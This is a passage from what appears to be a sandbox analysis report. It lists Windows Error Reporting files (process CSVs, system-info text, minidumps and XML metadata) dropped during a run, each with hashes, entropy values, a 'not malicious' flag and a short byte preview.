Entropy (8bit):	3.040652288779969
Encrypted:	false
SSDEEP:	768:L44Ps+CK7D1ELHu2xgIT7MG1Vww57NT7TVbkQjab+a:MKslAD+a2xguISVww5RTVgQGbT
MD5:	9986699023225449ED1515407D7738E3
SHA1:	83767987DB58DF265440B1CB5038E77AB400DB5C
SHA-256:	A40D3F876CFDA566018FC86CAC45D46959F696DF68E128F725A7676EEBA802FE
SHA-512:	77D9ED4CCF61493EB9027C248E3F4D9DEEC678982D7B2B7D5B5BB43C513FBE88DB5C63745EBA9464C5E16F06F759283BF1F2E8B0F74F8A0C946FE83F5491C9E8
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER388C.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.68382995334523
Encrypted:	false
SSDEEP:	96:TiZYWDtEOVtYNYPuW0H7YEZ78tFiB3vctlw0JkMasin2MLMqQIR0Y3:2ZDDqua+bTasin2MLMqnCY3
MD5:	2E17C54ACA86B07CBD3FA519FA01BB34
SHA1:	700D169F179A4224C8113B68C6E1E4D530E8EC00
SHA-256:	35E4F88B76910C31E47F47CB575ECE93033831982960ADC51586D49FBC003993
SHA-512:	F1D1438E43CF0396E04A9711E1F5A7A78F2CC5876ED09428092048A34C48A59F7661B13AC61134B652B94A82FDAD07DDE56260E736B4BCE84991A2C26CD6F6F1
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3EB1.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sun Dec 24 09:44:34 2023, 0x1205a4 type
Category:	dropped
Size (bytes):	89824
Entropy (8bit):	2.3713107014146475
Encrypted:	false
SSDEEP:	384:bCKoM0YPuox5bKnYQcsNb4eLuEotbkr8jxo7tpSaszkArSYXELWvzDNn:bT0YPuo3WnysNXLuEotbkr8lo7l+kArf
MD5:	AF3E092D6940059AB79808DBD4797F45
SHA1:	C9E241951810DAE028C4C01F9139D61516ACA10D
SHA-256:	E96214C4584C655032FFD51DD85D6D7AE94BB0729E12B022F9AAF10BDBCEEACB
SHA-512:	2020AD307BC4EDAF740F7058F0346F605156BD6553E716D77E965C7E67E958CE8A388811AD6A2A5DB5528C7FF4C599B26A6FC7039B2DC474FCCF262E202959EA
Malicious:	false
Preview:	MDMP..a..... ..........e............T...............h.......................F=..........`.......8...........T................>......................................................................................................eJ......h ......GenuineIntel............T...........x..e............................. ..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3FEA.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8332
Entropy (8bit):	3.701276582482392
Encrypted:	false
SSDEEP:	192:R6l7wVeJH5I6g6YEIoSU91NXgmfKpMpB389bLssf5Zm:R6lXJZI6g6YEnSU91dgmfKTL/fG
MD5:	F2F5B8387F5D341AA903919092697364
SHA1:	32A5F5C33F33D6133CAF4D7A6A049A5C4E86DF9D
SHA-256:	CC45989BA1C4110CCA1879C18C21BA9133E74F2F778E72C389C404D9575C487D
SHA-512:	27C48D2F1A4A00F7FF32C6224228AC538FD2AF7E57D85322BE4999F3AD032856AA886E1E48D3C1F66E32F36203219342719095ECC8A17C3387665A539240A623
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.3.4.0.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER402A.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4589
Entropy (8bit):	4.472179679162753
Encrypted:	false
SSDEEP:	48:cvIwWl8zsQJg77aI9kXWpW8VYFYm8M4JKaCFR1+q85kzRS3ydd:uIjfWI7Km7VtJKF1WeRS3ydd
MD5:	9D6F4C8A79190EA6C40F0EE33B1E87A3
SHA1:	05052B44EC06D784B9D7EA6DA1558AA496FB52CE
SHA-256:	DB3B441E963F7897D3169208971A01064B359EF228B767835476069939E12C08
SHA-512:	01D0016051C6ED55711018E022C9A4C22D1CE59A2CDD7E83D9C755E16DDDB218F06364A5A824AD73A08EB940907D00ED6A272B9D88D27057A049E3EC759BED4F
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="118127" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER403E.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	78130
Entropy (8bit):	3.040209880830209
Encrypted:	false
SSDEEP:	768:HyKCV2KCD/cbHuwgb7MG6VDwCV7ITT8bkQjab3y:SpspDUqwuIdVDwCVO8gQGbC
MD5:	4421546D09C88EF9D44452765E6432FD
SHA1:	5018BDE130DBB1A5B79A82DD2E64F8E0733AEAC5
SHA-256:	BDB9B1F433FEA69535CC3C7628E8DD4AA6632DB891FE821CEB4B93452A0921FC
SHA-512:	3F6207CEAA108FFD517EEBAFCC33A32D508590B6C20124A73FEF8024ADE24689078FA72BE4736B38E44A66B2B1BCB8C3B5F5A4007DD4AAA7BA7595919E045A9F
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER40DB.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6838454735601327
Encrypted:	false
SSDEEP:	96:TiZYWw2v/MWY3EYlW7HBYEZZeDtFif3DcPZwsG3BaMiRMuMfIyY3:2ZDwez1eNnmaMiRMuMwyY3
MD5:	92F859D48A8908D336B3893EC5279AF1
SHA1:	C5B9F74D0A52B0B87F7BABAD46E4BAACE2476CFB
SHA-256:	27529D12973204839B33A57E23D78BE4B7CA70225135AE42CADA12F2D80C5585
SHA-512:	FF196666D3C481188C389B1ED1154BE28DB4966D1086F66C042F9542E3956A0066A927A143CE69E7C6D689BCDEF373B39B3B2062E6784D7195D3859E4E9DBD43
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER59B8.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	85106
Entropy (8bit):	3.0348845179672286
Encrypted:	false
SSDEEP:	1536:D08xWAEyZLhHkuWdBhe7tGp+P+I+y+B+2+Q+r+Y+L+R+l+A+S+W2OrB+V+C+231K:D08xWAEyZLhHkuWdBhe7tGp+P+I+y+BV
MD5:	85DDEBCEA46B5BEF60C23A116A4C96A3
SHA1:	3F8A6E489786FF1188AEE072F9B80812EA4B409A
SHA-256:	713F5987F1C907B5B2518F7EB2E2B0277DC413F0A740D2CE466F6A753A373A5B
SHA-512:	ED670C3C209B7332A2731DBEA095C173FDA52BFB03566A803AE57C3295C882A3A0F526EE69FC008D181FB4E3776DAAA747738BBDC9C65DE9E2D0CFF628032162
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5C4B.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Sun Dec 24 09:44:42 2023, 0x1205a4 type
Category:	dropped
Size (bytes):	39258
Entropy (8bit):	2.331051245070574
Encrypted:	false
SSDEEP:	192:Pgl4fXH8O2/XFV/w4AUQTLlksjxwWL4PO7p5VSgrjOP89Lj:I82/XH/wYkFjxwN4yGX
MD5:	C490CBAF856848224A3DCDBC8522B519
SHA1:	9047F917360C67ADC177EDAE76EF4F574B69465B
SHA-256:	871C30F53B7606E60F7BC402CB96877B03E4CE4A2BCC84FA55FE34078A7657CB
SHA-512:	DB6BC43F6FF33A3BF75074ACD3B7DC3DCC21E50B61EBE18B6D58CFE6626B1C327728957B949CF4E45ABB9795E7A8FB8E7185016D4FE2FA39734D34307C7DF18D
Malicious:	false
Preview:	MDMP..a..... ..........e........................t...........................T.......8...........T...........p..........................................................................................................eJ..............GenuineIntel............T..............e............................. ..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5C88.tmp.txt

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6858527090649766
Encrypted:	false
SSDEEP:	96:TiZYWVvFF3ByY9YqWsMHxYEZLnotFi0EQKbSxwhJeVf0UoaAiUM5txTItY3:2ZDGacxz7aAiUM5LctY3
MD5:	E687A565FE1FF9633FE40239868C7CC8
SHA1:	387AF1E94B4BB2127E98D9CD460C5B8CE4FC5CF3
SHA-256:	93F187F1CE61D3F1EF1261A2DA61768657D686BFDFE7781952920E7ACE15AC38
SHA-512:	150E4675BD0E43252F15D452A5FAF00C6CF903D9949C0ADD946E42D551CA8E4D10C8D0C6640F7F8F5C9ADDBD71A3B774AC6B31E874608C23F6648C1D6424243C
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5E21.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8332
Entropy (8bit):	3.7000874795340355
Encrypted:	false
SSDEEP:	192:R6l7wVeJ2M6rc9H6YEI4SUcJMgmfIjpDp89bjGsfNBm:R6lXJ96rcd6YE3SUcCgmfIAjlfi
MD5:	07E0A6BDE219DE5F867D22986B0FD02F
SHA1:	EF442D7741FDA4AE4E8B5696303C6A1EB2358BAF
SHA-256:	BCA6A05C8FE4A38F0B6913C20751E97EA9BA31D24C5D2AA2D90D7A12BE86FCDA
SHA-512:	882F5E5E3FB658688640962A441B3BBEB0BCBE55F28568F2112D7A2982867492E1F2F2383488C604E772EB21E66265B33EFC9D5F4027C760AB38E17E710A18B6
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.8.3.6.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5E51.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4599
Entropy (8bit):	4.485151465018034
Encrypted:	false
SSDEEP:	48:cvIwWl8zsQJg77aI9kXWpW8VYUYm8M4J4cOqFq+q8jTO424gvWlwd:uIjfWI7Km7VYJBOaO4OWlwd
MD5:	27BBE4A24D4E01396FD39ECEF4306910
SHA1:	C845C36AA70C69D3EDC0FC1DFF0995EFAE8A79D0
SHA-256:	A3FE7AFA79C2BD84CB59E29E78E38DBD162EFE6116FB598509FC06E858DAEA5D
SHA-512:	C9D8ED1B0B8E7B172C781864F4430B2B2AAD899E210D99739F6CBE5529CDBC0C97D61BF83206478BAC2CF9A9B66CEAF7B0DEDAAA71CB486C0800A39BBC91D789
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="118127" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5E76.tmp.csv

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	80702
Entropy (8bit):	3.037206324200995
Encrypted:	false
SSDEEP:	1536:zwJwpI7PCmv3iICrtejNJGkEQGbyZNY6zR0:zwJwpI7PCmv3iICrtejNJGkEQGbyZNY5
MD5:	4DE05F4F22ED3D7591C97415223F0DDA
SHA1:	757735D7768239918C14144DCD6BD5935D141398
SHA-256:	91CBE70C0426D0D3EB6FF09E24341985301E9D0EF55257EBC3D96E3F5EF4A432
SHA-512:	E3E917E4CE568C33329A2E74515341642E741812091F6768A3A499ABB31B9C3D652A35A35EFF2AAE5A474FBE3B681534099AFD840470C276C368207F268C4FC9
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

